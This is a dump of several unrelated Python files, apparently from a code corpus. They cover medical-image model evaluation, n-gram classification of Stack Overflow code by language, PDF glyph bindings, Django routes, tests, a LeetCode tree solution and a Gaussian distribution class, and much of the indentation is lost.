val_seg_pred_au.append(preds_cls_seg_au)
# cls
#print(cls_logits)
if opt.do_cls:
probs_cls = torch.softmax(cls_logits, dim=1)
val_cls_probs.append(probs_cls[...,1:].detach().cpu().numpy())
preds_cls = (probs_cls[...,1:] > 0.5).type(torch.long)
val_cls_pred.append(preds_cls.cpu().data.numpy())
if not os.path.exists(os.path.join(opt.logs, "cf")):
os.makedirs(os.path.join(opt.logs, "cf"))
val_gt = np.concatenate(val_gt, axis=0)
if opt.do_cls:
val_cls_pred = np.concatenate(val_cls_pred, axis=0)
val_cls_probs = np.concatenate(val_cls_probs, axis=0)
save_cf_png_dir = os.path.join(opt.logs, "cf", "eval_cls_cf.png")
save_metric_dir = os.path.join(opt.logs, "eval_metric_cls.txt")
result_str = get_results(val_gt, val_cls_pred, val_cls_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_cls_val:[cls]: %s" % (result_str))
if opt.do_seg:
val_seg_pred = np.concatenate(val_seg_pred, axis=0)
val_seg_probs = np.concatenate(val_seg_probs, axis=0)
# seg2cls
save_cf_png_dir = os.path.join(opt.logs, "cf", "eval_seg_cf.png")
save_metric_dir = os.path.join(opt.logs, "eval_metric_seg.txt")
result_str = get_results(val_gt, val_seg_pred, val_seg_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_seg_val:[seg2cls]: %s" % (result_str))
if opt.do_seg and opt.use_aux:
val_seg_pred_au = np.concatenate(val_seg_pred_au, axis=0)
val_seg_probs_au = np.concatenate(val_seg_probs_au, axis=0)
# seg2cls
save_cf_png_dir_au = os.path.join(opt.logs, "cf", "eval_seg_au_cf.png")
save_metric_dir_au = os.path.join(opt.logs, "eval_metric_seg_au.txt")
result_str_au = get_results(val_gt, val_seg_pred_au, val_seg_probs_au, save_cf_png_dir_au, save_metric_dir_au)
logger.info("tgt_seg_au_val:[seg2cls]: %s" % (result_str_au))
time_elapsed = time.time() - since
logger.info("Eval complete in {:.0f}m {:.0f}s".format(time_elapsed // 60, time_elapsed % 60))
def extra_eval_model(model, dataloaders, log_dir="./log/", logger=None, opt=None):
since = time.time()
if True:
# eval infection segmentation and cls
logger.info("-"*8+"extra eval infection cls"+"-"*8)
model.eval()
val_gt = []
val_cls_pred = []
val_cls_probs = [] # for VOC
val_seg_pred = []
val_seg_probs = [] # for VOC
val_seg_probs_au = []
val_seg_pred_au = [] # for VOC
annotations = dataloaders["tgt_cls_extra_val"].dataset.annotations
for batch_idx, (inputs, labels) in enumerate(dataloaders["tgt_cls_extra_val"], 0):
inputs = inputs.to(device)
# adjust label
val_gt.append(labels.cpu().data.numpy())
with torch.set_grad_enabled(False):
annotation = annotations[batch_idx]
img_dir = annotation.strip().split(',')[0]
img_name = Path(img_dir).name
print(batch_idx, len(annotations))
if opt.use_aux:
cls_logits, _, seg_logits, _, seg_logits_au = model(inputs)
else:
cls_logits, _, seg_logits, _, _ = model(inputs)
if opt.do_seg:
seg_probs = torch.softmax(seg_logits, dim=1)
val_seg_probs.append(seg_probs[:,-1:].detach().cpu().view(seg_probs.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot = probs2one_hot(seg_probs.detach())
# for save
predicted_mask = predicted_mask_onehot.squeeze().cpu().numpy() # 3xwxh
mask_inone = (np.zeros_like(predicted_mask[0])+predicted_mask[1]*128+predicted_mask[2]*255).astype(np.uint8)
# save dir:
save_dir = os.path.join(opt.logs, "tgt_cls_extra_val", "eval")
#
if not os.path.exists(save_dir):
os.makedirs(save_dir)
cv2.imwrite(os.path.join(save_dir, img_name), mask_inone)
# seg2cls
preds_cls_seg = (predicted_mask_onehot[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred.append(preds_cls_seg)
if opt.do_seg and opt.use_aux:
seg_probs_au = torch.softmax(seg_logits_au, dim=1)
val_seg_probs_au.append(seg_probs_au[:,-1:].detach().cpu().view(seg_probs_au.shape[0], 1, -1).max(-1)[0])
predicted_mask_onehot_au = probs2one_hot(seg_probs_au.detach())
# for save
predicted_mask_au = predicted_mask_onehot_au.squeeze().cpu().numpy() # 3xwxh
mask_inone_au = (np.zeros_like(predicted_mask_au[0])+predicted_mask_au[1]*128+predicted_mask_au[2]*255).astype(np.uint8)
# save dir:
save_dir_au = os.path.join(opt.logs, "tgt_cls_extra_val_au", "eval")
#
if not os.path.exists(save_dir_au):
os.makedirs(save_dir_au)
cv2.imwrite(os.path.join(save_dir_au, img_name), mask_inone_au)
# seg2cls
preds_cls_seg_au = (predicted_mask_onehot_au[:,-1:].sum(-1).sum(-1) > 0).cpu().numpy().astype(np.uint8)
val_seg_pred_au.append(preds_cls_seg_au)
# cls
#print(cls_logits)
if opt.do_cls:
probs_cls = torch.softmax(cls_logits, dim=1)
val_cls_probs.append(probs_cls[...,1:].detach().cpu().numpy())
preds_cls = (probs_cls[...,1:] > 0.5).type(torch.long)
val_cls_pred.append(preds_cls.cpu().data.numpy())
if not os.path.exists(os.path.join(opt.logs, "cf")):
os.makedirs(os.path.join(opt.logs, "cf"))
val_gt = np.concatenate(val_gt, axis=0)
if opt.do_cls:
val_cls_pred = np.concatenate(val_cls_pred, axis=0)
val_cls_probs = np.concatenate(val_cls_probs, axis=0)
save_cf_png_dir = os.path.join(opt.logs, "cf", "extra_eval_cls_cf.png")
save_metric_dir = os.path.join(opt.logs, "extra_eval_metric_cls.txt")
result_str = get_results(val_gt, val_cls_pred, val_cls_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_cls_extra_val:[cls]: %s" % (result_str))
if opt.do_seg:
val_seg_pred = np.concatenate(val_seg_pred, axis=0)
val_seg_probs = np.concatenate(val_seg_probs, axis=0)
# seg2cls
save_cf_png_dir = os.path.join(opt.logs, "cf", "extra_eval_seg_cf.png")
save_metric_dir = os.path.join(opt.logs, "extra_eval_metric_seg.txt")
result_str = get_results(val_gt, val_seg_pred, val_seg_probs, save_cf_png_dir, save_metric_dir)
logger.info("tgt_seg_extra_val:[seg2cls]: %s" % (result_str))
if opt.do_seg and opt.use_aux:
val_seg_pred_au = np.concatenate(val_seg_pred_au, axis=0)
val_seg_probs_au = np.concatenate(val_seg_probs_au, axis=0)
# seg2cls
save_cf_png_dir_au = os.path.join(opt.logs, "cf", "extra_eval_seg_au_cf.png")
save_metric_dir_au = os.path.join(opt.logs, "extra_eval_metric_seg_au.txt")
result_str_au = get_results(val_gt, val_seg_pred_au, val_seg_probs_au, save_cf_png_dir_au, save_metric_dir_au)
logger.info("tgt_seg_au_extra_val:[seg2cls]: %s" % (result_str_au))
time_elapsed = time.time() - since
logger.info("Extra_Eval complete in {:.0f}m {:.0f}s".format(time_elapsed // 60, time_elapsed % 60))
def get_argument():
parser = argparse.ArgumentParser()
parser.add_argument('--config', default="./cfgs/experiment.yaml", type=str)
#parser.add_argument('--setseed', default=2020, type=int)
parser.add_argument('--fold', default=0, type=int)
parser.add_argument('--setgpuid', default=0, type=int)
opt = parser.parse_args()
with open(opt.config) as f:
config = yaml.load(f)
for k, v in config['common'].items():
setattr(opt, k, v)
    # replace experiment
opt.experiment = opt.experiment.replace("only", "mmd")
opt.seg_augment = True
opt.cls_augment = True
opt.do_cls_mmd = True
opt.do_seg = True
opt.do_cls = True
opt.do_seg_mmd = False
opt.eval_cls_times = 50
opt.eval_times = 50
# opt.random_seed = opt.setseed
opt.random_seed = 1010 * (opt.fold + 1)
opt.gpuid = opt.setgpuid
selected_drr_datasets_indexes = np.array(opt.selected_drr_datasets_indexes+opt.selected_drr_datasets_indexes)
#print(selected_drr_datasets_indexes)
# # [[0, 0, 0], [1, 0, 0], [0, 0, 1], [1, 0, 1]]
print(selected_drr_datasets_indexes[-1][-1])
selected_drr_datasets_indexes[2][-1] = 1
selected_drr_datasets_indexes[3][-1] = 1
opt.selected_drr_datasets_indexes = [list(_) for _ in list(selected_drr_datasets_indexes)]
log_dir = "./{}/{}/{}".format("logs_bk", opt.experiment, "fold%d"%opt.fold)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
opt.logs = log_dir
return opt
if __name__ == "__main__":
opt = get_argument()
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "{}".format(opt.gpuid)
setup_seed(opt.random_seed)
assert opt.mode == 12, ("opt.mode is not supported in %s" % __file__)
log_dir = opt.logs
logger = setup_logger("{}".format(os.path.basename(__file__).split(".")[0]),
save_dir=opt.logs, distributed_rank=0, filename="log_eval.txt")
logger.info(opt)
batch_size = opt.batch_size
num_epochs = opt.num_epochs
use_pretrained = True
device_name = "cuda" if torch.cuda.is_available() else "cpu"
device = torch.device(device_name)
model_ft = SegClsModule(opt)
train_dataset, tgt_cls_train_dataset, tgt_cls_val_dataset, tgt_lung_seg_val_dataset = genDataset(opt)
tgt_cls_extra_val_dataset = genExtraForEvalDataset(opt)
logger.info("-"*8+"train:"+"-"*8)
logger.info(train_dataset.annotations)
logger.info("-"*8+"tgt_cls_train:"+"-"*8)
logger.info(tgt_cls_train_dataset.annotations)
logger.info("-"*8+"tgt_cls_val:"+"-"*8)
logger.info(tgt_cls_val_dataset.annotations)
logger.info("-"*8+"tgt_cls_extra_val:"+"-"*8)
logger.info(tgt_cls_extra_val_dataset.annotations)
# logger.info("-"*8+"tgt_lung_seg_val:"+"-"*8)
# logger.info(tgt_lung_seg_val_dataset.annotations)
image_datasets = {'train': train_dataset, 'tgt_cls_train': tgt_cls_train_dataset, 'tgt_cls_val': tgt_cls_val_dataset, 'tgt_cls_extra_val': tgt_cls_extra_val_dataset, "tgt_lung_seg_val": tgt_lung_seg_val_dataset}
shuffles = {"train": True,'tgt_cls_train': True, 'tgt_cls_val': False, 'tgt_cls_extra_val': False, "tgt_lung_seg_val": False}
batch_sizes_dict = {"train": batch_size,'tgt_cls_train': batch_size, 'tgt_cls_val': 1, 'tgt_cls_extra_val': 1, "tgt_lung_seg_val": 1}
drop_lasts = {"train": True,'tgt_cls_train': True, 'tgt_cls_val': False, 'tgt_cls_extra_val': False, "tgt_lung_seg_val": False}
number_worker_dict = {"train": 4,'tgt_cls_train': 4, 'tgt_cls_val': 0, 'tgt_cls_extra_val': 0, "tgt_lung_seg_val": 0}
dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_sizes_dict[x], shuffle=shuffles[x], num_workers=number_worker_dict[x], drop_last=drop_lasts[x]) for x in ['train', 'tgt_cls_train', 'tgt_cls_val', 'tgt_cls_extra_val', "tgt_lung_seg_val"]}
# Send the model to GPU
weight_path = os.path.join(log_dir, "latest.pth")
model_ft.load_state_dict(torch.load(weight_path))
model_ft = model_ft.to(device)
model_ft.eval()
#eval_model(model_ft, dataloaders_dict, log_dir=log_dir, logger=logger, opt=opt)
extra_eval_model(model_ft, dataloaders_dict, log_dir=log_dir, logger=logger, opt=opt)
|
python
|
# Author: Andrew Sainz
#
# Purpose: XMLAnalyze is designed to iterate through a collection of post data collected from Stack Overflow
#          forums. The <code>-tagged content of each post is analyzed to determine the language of the code
#          being utilized.
#
# How to use: run from the command line as "python XMLAnalyze.py Posts.xml <known Java file> <known C++ file>"
#             (the script expects the posts XML plus files of known Java and known C++ code; see sys.argv below).
import sys
import re
import os
import nltk
import operator
from random import randint
from nltk.util import ngrams
from ngramFunctions import *
from XMLParser import *
from frequencyFunctions import *
from lxml import etree
def features(sentence):
words = sentence.lower().split()
return dict(('contains(%s)' %w, True) for w in words)
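# A small illustration (hypothetical input): features("Hello World") returns
# {'contains(hello)': True, 'contains(world)': True}.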
if __name__ == '__main__':
xmldoc = sys.argv[1]
knownJava = sys.argv[2]
knownCpp = sys.argv[3]
###################################################################
# Section 1: Gather known data to create frequencies for known information
###################################################################
knownJavaFile = open(knownJava)
knownJavaString = ""
for line in knownJavaFile:
knownJavaString += line
# knownJavaGram = ngramsFunction(knownJavaString, 3)
knownJavaGram = ngrams(knownJavaString.split(' '),3)#ngramsFunction(knownJavaString, 3)
knownJavaHashFreq = nltk.FreqDist(knownJavaGram)
# javaMaxGram = max(knownJavaHashFreq, key=knownJavaHashFreq.get)
# print(javaMaxGram, knownJavaHashFreq[javaMaxGram])
knownCPPFile = open(knownCpp)
knownCPPString = ""
for line in knownCPPFile:
knownCPPString += line
# print(knownCPPString)
knownCPPGram = ngrams(knownCPPString.split(' '),3)
knownCPPHashFreq = nltk.FreqDist(knownCPPGram)
# cppMaxGram = max(knownCPPHashFreq, key=knownCPPHashFreq.get)
# print(cppMaxGram, knownCPPHashFreq[cppMaxGram])
#############################################################################################
# Section 2: to calculate trigram Probability
#############################################################################################
kneserJava = nltk.KneserNeyProbDist(knownJavaHashFreq)
kneserCPP = nltk.KneserNeyProbDist(knownCPPHashFreq)
kneserJavaHash = convertProbListToHash(kneserJava)
kneserCPPHash = convertProbListToHash(kneserCPP)
cpp = 0
java = 0
totalCppWithTag = 0
totalJavaWithTag = 0
totalJavaTags = 0
totalCppTags = 0
totalEval = 0
resultsFile = open('Results.txt', 'a')
codeFile = open('Code.txt', 'a')
analyticsFile = open('Analytics.txt', 'a')
resultsFileString = codeFileString = analyticsString = ''
presencePosCpp = presenceNegCpp = absencePosCpp = absenceNegCpp =0
presencePosJava = presenceNegJava = absencePosJava = absenceNegJava = 0
# tree = ET.parse(xmldoc)
# root = tree.getroot()
for event, element in etree.iterparse(xmldoc, tag="row"):
body = element.get('Body')
# Only allow posts with a code tag to be added
if '<code>' in body:
postId = element.get('Id')
# Tags for comment post
tags = element.get('Tags')
            if tags is None:
                continue
            tags = tags.lower()
# if not ('<java>' or 'c++' or '<c>' or '<c++-faq>' or '<android>' or '<spring>' or '<swing>' or '<pass-by-reference>' or '<eclipse>' or '<regex>' or '<recursion>' or '<binary-tree>' or '<software-engineering>' or '<divide-by-zero>' or '<arraylist>' or '<garbage-collection>' or '<object>' or '<arrays>' or '<iterator>' or '<hashcode>' or '<inheritance>' or '<tostring>' or '<unicode>' or '<quicksort>' or '<sorting>' or '<jar>' or '<bubble-sort>' or '<hashcode>' or '<multidimensional-array>' or '<codebase>' or '<class>') in tags:
# continue
            # Skip if post contains tags from multiple languages
# if (('<c++>' or '<c++-faq>' or '<c>' in tags) and ('<java>' or '<android>' or '<spring>' or '<swing>' in tags)) :
# continue
code = parseBodyForTagCode(body)
codeString = ''
for item in code:
snipetLength = len(item.split())
if snipetLength > 5:
codeString = codeString+re.sub('<code>|</code>',' ',item)
codeString = re.sub('\n|\r|/\s\s+/g}',' ',codeString)
codeString = re.sub('\.', ' ', codeString)
codeString = re.sub('\t', '',codeString)
codeString = re.sub(re.compile("/\*.*?\*/",re.DOTALL ) ,"" ,codeString)
codeString = re.sub(re.compile("//.*?\n" ) ,"" ,codeString)
codeString = re.sub( '[^0-9a-zA-Z]+', ' ', codeString )
codeString = re.sub( '\s+', ' ', codeString).strip()
codeFileString = codeFileString+codeString
codeLength = len(codeString.split())
# print(codeLength)
if(codeLength < 3):
continue
totalEval += 1# total posts not skipped
            # In some cases a post can include tags associated with more than one language
            if any(t in tags for t in ('c++', '<c++-faq>', '<c>')):
totalCppTags += 1
            if any(t in tags for t in ('<java>', '<android>', '<spring>', '<swing>')):
totalJavaTags += 1
# print(codeString)
codeList = ngrams(codeString.split(' '),5)
codeGram = nltk.FreqDist(codeList)
for gram in codeGram:
cppValue = kneserCPPHash.get(str(gram))
javaValue = kneserJavaHash.get(str(gram))
if cppValue != None and javaValue != None:
# Compare to the frequency values
if cppValue > javaValue:
cpp += 1
else:
java += 1
# if there is a hit for either one then add to hit value
elif cppValue == None and javaValue != None:
java += 1
elif cppValue != None and javaValue == None:
cpp += 1
# if hit values are the same make a guess on language
if java == cpp:
ran = randint(0,1)
if(ran == 0):
java += 1
else:
cpp += 1
# Done looking for gram hit values
#################################
# fix absence
#################################
# if java == 0 and ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
# absenceNegJava += 1
# if cpp == 0 and ('c++' or '<c++-faq>' or '<c>') in tags:
# absenceNegCpp += 1
# if java > cpp and not ('java' or '<android>' or '<spring>' or '<swing>') in tags:
# print('absence is true')
# absencePosJava += 1
# if cpp > java and not ('c++' or '<c++-faq>' or '<c>') in tags:
# absencePosCpp += 1
#################################
            # if no values were hit then move on to next post row
# if java == 0 and cpp == 0:
# continue
determinedCpp = determinedJava = False
resultsFileString = resultsFileString+'Grams assigned as followed:\n'
resultsFileString = resultsFileString+'PostId: {}\nC++: {} Java: {}\nCode: {} \n'.format(postId,cpp,java,codeString)
if cpp > java:
resultsFileString = resultsFileString+'Snippet determined to be C++\nTags include {}\n\n'.format(tags)
determinedCpp = True
# if ('c++' or '<c++-faq>' or '<c>') in tags:
# totalCppWithTag += 1
elif java > cpp:
resultsFileString = resultsFileString+'Snippet determined to be Java\nTags include {}\n\n'.format(tags)
determinedJava = True
# if ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
# totalJavaWithTag += 1
# analyze results
            if determinedCpp and any(t in tags for t in ('c++', '<c++-faq>', '<c>')):
                presencePosCpp += 1
            if not determinedCpp and any(t in tags for t in ('c++', '<c++-faq>', '<c>')):
                presenceNegCpp += 1
            if determinedCpp and not any(t in tags for t in ('c++', '<c++-faq>', '<c>')):
                absencePosCpp += 1
            if not determinedCpp and not any(t in tags for t in ('c++', '<c++-faq>', '<c>')):
                absenceNegCpp += 1
            if determinedJava and any(t in tags for t in ('<java>', '<android>', '<spring>', '<swing>')):
                presencePosJava += 1
            if not determinedJava and any(t in tags for t in ('<java>', '<android>', '<spring>', '<swing>')):
                presenceNegJava += 1
            if determinedJava and not any(t in tags for t in ('<java>', '<android>', '<spring>', '<swing>')):
                absencePosJava += 1
            if not determinedJava and not any(t in tags for t in ('<java>', '<android>', '<spring>', '<swing>')):
                absenceNegJava += 1
# if ('c++' or '<c++-faq>' or '<c>') in tags:
# # presence is true
# if cpp > java:
# # positive is true
# # true positive
# presencePosCpp += 1
# else:
# # false negative
# presenceNegCpp += 1
# # elif cpp > java:
# # # been determined cpp but no cpp tags
# # # incorectly determined
# # # false positive
# # absencePosCpp += 1
# # else:
# # # determined not to be cpp correctly
# # # true negative
# # absenceNegCpp += 1
# if ('<java>' or '<android>' or '<spring>' or '<swing>') in tags:
# # presence is true
# if java > cpp:
# presencePosJava += 1
# else:
# presenceNegJava += 1
# # elif java > cpp:
# absencePosJava += 1
# else:
# absenceNegJava += 1
java = 0
cpp = 0
element.clear()
for ancestor in element.xpath('ancestor-or-self::*'):
while ancestor.getprevious() is not None:
del ancestor.getparent()[0]
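    # Mapping of the counters above to confusion-matrix cells, as labelled in the
    # analytics output below: presencePos* = true positives, presenceNeg* = false
    # negatives, absencePos* = false positives, absenceNeg* = true negatives.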
javaSensitivity = presencePosJava / (presencePosJava+presenceNegJava)
javaSpecificity = absenceNegJava / (absenceNegJava+absencePosJava)
javaRateFalsePos = absencePosJava / (absencePosJava+absenceNegJava)
javaRateFalseNeg = presenceNegJava / (presenceNegJava+presencePosJava)
javaPosPredict = presencePosJava / (presencePosJava+ absencePosJava)
javaNegPredict = presenceNegJava / (presenceNegJava+ absenceNegJava)
javaRelativeRisk = (presencePosJava/ (presencePosJava + presenceNegJava)) / (absencePosJava / (absencePosJava + absenceNegJava))
cppSensitivity = presencePosCpp / (presencePosCpp+presenceNegCpp)
cppSpecificity = absenceNegCpp / (absenceNegCpp+absencePosCpp)
cppRateFalsePos = absencePosCpp / (absencePosCpp+absenceNegCpp)
cppRateFalseNeg = presenceNegCpp / (presenceNegCpp+presencePosCpp)
cppPosPredict = presencePosCpp / (presencePosCpp+ absencePosCpp)
cppNegPredict = presenceNegCpp / (presenceNegCpp+absenceNegCpp)
cppRelativeRisk = (presencePosCpp/ (presencePosCpp + presenceNegCpp)) / (absencePosCpp / (absencePosCpp + absenceNegCpp))
analyticsString = 'Java\n------\nTrue Positive: {}\nFalse Negative: {}\nFalse Positive: {}\nTrue Negative: {}'.format(presencePosJava,presenceNegJava,absencePosJava,absenceNegJava)
analyticsString += '\nSensitivity: {}\nSpecificity: {}'.format(javaSensitivity, javaSpecificity)
analyticsString += '\nRate False Positives: {}\nRate False Negatives: {}'.format(javaRateFalsePos, javaRateFalseNeg)
analyticsString += '\nEstimate Positive Predictive Value: {}\nEstimate Negative Predictive Value: {}'.format(javaPosPredict, javaNegPredict)
analyticsString += '\nRelative Risk: {}'.format(javaRelativeRisk)
analyticsString += '\n\nC++\n------\nTrue Positive: {}\nFalse Negative: {}\nFalse Positive: {}\nTrue Negative: {}'.format(presencePosCpp,presenceNegCpp,absencePosCpp,absenceNegCpp)
analyticsString += '\nSensitivity: {}\nSpecificity: {}'.format(cppSensitivity, cppSpecificity)
analyticsString += '\nRate False Positives: {}\nRate False Negatives: {}'.format(cppRateFalsePos, cppRateFalseNeg)
analyticsString += '\nEstimate Positive Predictive Value: {}\nEstimate Negative Predictive Value: {}'.format(cppPosPredict, cppNegPredict)
analyticsString += '\nRelative Risk: {}'.format(cppRelativeRisk)
#############################################################################################
# Section Output
#############################################################################################
resultsFile.write(resultsFileString)
codeFile.write(codeFileString)
analyticsFile.write(analyticsString)
# print('Total Java snippets determined and also have tags (java, android, spring, swing): {}'.format(totalJavaWithTag))
# print('Total Java snippets: {}'.format(totalJavaTags))
# print('Total C++ snippets determined and also have tags (c++, c++-faq, c): {}'.format(totalCppWithTag))
# print('Total C++ snippets: {}'.format(totalCppTags))
# print('Total snippets evaluated: {}'.format(totalEval))
|
python
|
from .bindings import so, FPDF_PATH_POINT, FPDF_RECT
from ctypes import pointer
class Glyph:
'''Represents Glyph drawing instructions'''
LINETO = 0 #: LineTo instruction
CURVETO = 1 #: CurveTo instruction
MOVETO = 2 #: MoveTo instruction
def __init__(self, glyph, parent):
self._glyph = glyph
self._parent = parent
self._bounds = None
def __len__(self):
return so.REDGlyph_Size(self._glyph)
def __iter__(self):
for i in range(len(self)):
yield self[i]
def __getitem__(self, i):
'''Returns a 4-tuple representing this drawing instruction: (x, y, type, close).
Args:
i (int): index of the instruction
'''
point = FPDF_PATH_POINT()
so.REDGlyph_Get(self._glyph, i, pointer(point))
return point.x, point.y, point.type, point.close
# @memoize
# def _bounds(self):
# if len(self) == 0:
# return None
# coords = [(x, y) for x, y, _, _ in self]
# xmin = min(x for x,_ in coords)
# xmax = max(x for x,_ in coords)
# ymin = min(y for _,y in coords)
# ymax = max(y for _,y in coords)
# return xmin, ymin, xmax, ymax
def bounds(self):
if self._bounds is None:
rect = FPDF_RECT(0., 0., 0., 0.)
so.REDGlyph_GetBounds(self._glyph, pointer(rect))
self._bounds = rect.left, rect.bottom, rect.right, rect.top
return self._bounds
@property
def ascent(self):
bounds = self.bounds()
return max(0, bounds[3])
@property
def descent(self):
_, ymin, _, _ = self.bounds()
return max(0, -ymin)
@property
def advance(self):
_, _, xmax, _ = self.bounds()
return max(0, xmax)
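# A minimal usage sketch (hypothetical glyph object obtained from the bindings above):
# for x, y, kind, close in glyph:
#     if kind == Glyph.MOVETO:
#         pass  # start a new subpath at (x, y)
#     elif kind == Glyph.LINETO:
#         pass  # straight segment to (x, y)
#     elif kind == Glyph.CURVETO:
#         pass  # curve control/end point at (x, y)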
|
python
|
n = int(raw_input())
comportadas = 0
children = []
for i in range(n):
ent = map(str, raw_input().split())
children.append(ent[1])
if ent[0] == "+":
comportadas += 1
children.sort()
for child in children:
print child
print "Se comportaram: %d | Nao se comportaram: %d" % (comportadas, n - comportadas)
|
python
|
import sys
from mpc_func import *
try:
poses = load_poses(sys.argv[1])
except:
    print('Please use the right .csv file!')
    sys.exit(1)
sparseness = 100
sparse_poses = poses[1::sparseness, 1:3]
path = [148, 150, 151, 153, 154, 156, 158, 160, 162, 163]
dt = 1 # [s] discrete time
lr = 1.0 # [m]
T = 6 # number of horizon
max_speed = 5
min_speed = -5
speed_now = 1
theta = -1.5
path_poses = sparse_poses[path[:T+1], :]
u, next_x, xstar, ustar = path_poses_to_input(path_poses, speed_now, theta,
dt, lr, T, max_speed, min_speed)
# plot the result
plt.figure(figsize=(10,10))
plt.subplot(3, 1, 1)
plt.plot(path_poses[0][0], path_poses[0][1], 'xb', label='current pose')
plt.plot(next_x[0], next_x[1], 'xr', label='next pose given current control output')
plt.plot(GetListFromMatrix(xstar.value[0, :]), GetListFromMatrix(
xstar.value[1, :]), '-.', label='estimated trajectory given control outputs')
plt.plot(path_poses[:T,0], path_poses[:T,1], label='reference trajectory')
plt.axis("equal")
plt.xlabel("x[m]")
plt.ylabel("y[m]")
plt.legend()
plt.grid(True)
plt.subplot(3, 1, 2)
plt.cla()
plt.plot(GetListFromMatrix(xstar.value[2, :]), '-b',label='linear velocity')
plt.plot(GetListFromMatrix(xstar.value[3, :]), '-r',label='pose angle')
#plt.ylim([-1.0, 1.0])
plt.ylabel("velocity[m/s]")
plt.xlabel("horizon")
plt.legend()
plt.grid(True)
plt.subplot(3, 1, 3)
plt.cla()
plt.plot(GetListFromMatrix(ustar.value[0, :]), '-r', label="acceleration")
plt.plot(GetListFromMatrix(ustar.value[1, :]), '-b', label="beta")
#plt.ylim([-0.5, 0.5])
plt.legend()
plt.grid(True)
plt.show()
|
python
|
from django.urls import path, include
from . import views
urlpatterns = [
path('', views.index, name = 'index'),
path('home/',views.home,name = 'home'),
path('maps/',views.maps, name = 'maps'),
path('maps/3dmap',views.mapsd, name = 'mapsd'),
path('accounts/login/', views.loginpage , name = 'loginpage'),
path('login/validate', views.loginvalidate , name = 'loginvalidate'),
path('sponsors/', views.sponsors , name = 'sponsors'),
path('team/', views.team , name = 'team'),
path('gallery/', views.gallery, name = 'gallery'),
path('social/', views.social, name = 'social'),
path('events/', views.events , name = 'events'),
path('signup/', views.signup , name = 'signup'),
]
|
python
|
import os
import sys
import unittest
if __name__ == "__main__":
# add the path to be execute in the main directory
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
testmodules = [
'tests.test_nsga2',
#'pymoo.usage.test_usage'
]
suite = unittest.TestSuite()
for t in testmodules:
suite.addTest(unittest.defaultTestLoader.loadTestsFromName(t))
unittest.TextTestRunner().run(suite)
|
python
|
import logging
import os
from peek_plugin_base.PeekVortexUtil import peekStorageName
logger = logging.getLogger(__name__)
class StorageTestMixin:
def __init__(self):
self._dbConn = None
def setUp(self) -> None:
from peek_storage._private.storage import setupDbConn
from peek_storage._private.storage.DeclarativeBase import metadata
import peek_storage
from peek_plugin_base.storage.DbConnection import DbConnection
from peek_storage._private.service.PeekStorageConfig import PeekStorageConfig
from peek_platform import PeekPlatformConfig
PeekPlatformConfig.componentName = peekStorageName
config = PeekStorageConfig()
alembicDir = os.path.join(
os.path.dirname(peek_storage._private.__file__),
"alembic")
self._dbConn = DbConnection(dbConnectString=config.dbConnectString,
metadata=metadata,
alembicDir=alembicDir,
dbEngineArgs=config.dbEngineArgs,
enableCreateAll=False,
enableForeignKeys=False)
self._dbConn.migrate()
def tearDown(self) -> None:
self._dbConn.closeAllSessions()
|
python
|
# -*- coding: utf-8 -*-
"""
654. Maximum Binary Tree
Given an integer array with no duplicates, a maximum binary tree built from this array is defined as follows:
The root is the maximum number in the array.
The left subtree is the maximum tree constructed from the subarray left of the maximum number.
The right subtree is the maximum tree constructed from the subarray right of the maximum number.
Construct the maximum tree from the given array and output the root node of this tree.
"""
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def constructMaximumBinaryTree(self, nums) -> TreeNode:
if not nums:
return None
max_val = nums[0]
max_ind = 0
for ind, val in enumerate(nums):
if val > max_val:
max_ind = ind
max_val = val
l_node = self.constructMaximumBinaryTree(nums[:max_ind])
r_node = self.constructMaximumBinaryTree(nums[max_ind + 1:])
root = TreeNode(val=max_val, left=l_node, right=r_node)
return root
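# Minimal usage sketch (assumed example input, not part of the original file):
# for [3, 2, 1, 6, 0, 5] the maximum is 6, so 6 becomes the root, the left
# subtree is built from [3, 2, 1] and the right subtree from [0, 5].
if __name__ == "__main__":
    root = Solution().constructMaximumBinaryTree([3, 2, 1, 6, 0, 5])
    assert root.val == 6 and root.left.val == 3 and root.right.val == 5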
|
python
|
import torch
import math
import numpy as np
from torch.distributions.multivariate_normal import MultivariateNormal
from spirl.utils.pytorch_utils import ten2ar
from spirl.utils.general_utils import batch_apply
class Gaussian:
""" Represents a gaussian distribution """
# TODO: implement a dict conversion function
def __init__(self, mu, log_sigma=None):
"""
:param mu:
:param log_sigma: If none, mu is divided into two chunks, mu and log_sigma
"""
if log_sigma is None:
if not isinstance(mu, torch.Tensor):
import pdb; pdb.set_trace()
mu, log_sigma = torch.chunk(mu, 2, -1)
self.mu = mu
self.log_sigma = torch.clamp(log_sigma, min=-10, max=2) if isinstance(log_sigma, torch.Tensor) else \
np.clip(log_sigma, a_min=-10, a_max=2)
self._sigma = None
def sample(self):
return self.mu + self.sigma * torch.randn_like(self.sigma)
def kl_divergence(self, other):
"""Here self=q and other=p and we compute KL(q, p)"""
return (other.log_sigma - self.log_sigma) + (self.sigma ** 2 + (self.mu - other.mu) ** 2) \
/ (2 * other.sigma ** 2) - 0.5
def nll(self, x):
# Negative log likelihood (probability)
return -1 * self.log_prob(x)
def log_prob(self, val):
"""Computes the log-probability of a value under the Gaussian distribution."""
return -1 * ((val - self.mu) ** 2) / (2 * self.sigma**2) - self.log_sigma - math.log(math.sqrt(2*math.pi))
def entropy(self):
return 0.5 + 0.5 * math.log(2 * math.pi) + torch.log(self.sigma)
@property
def sigma(self):
if self._sigma is None:
self._sigma = self.log_sigma.exp()
return self._sigma
@property
def shape(self):
return self.mu.shape
@staticmethod
def stack(*argv, dim):
return Gaussian._combine(torch.stack, *argv, dim=dim)
@staticmethod
def cat(*argv, dim):
return Gaussian._combine(torch.cat, *argv, dim=dim)
@staticmethod
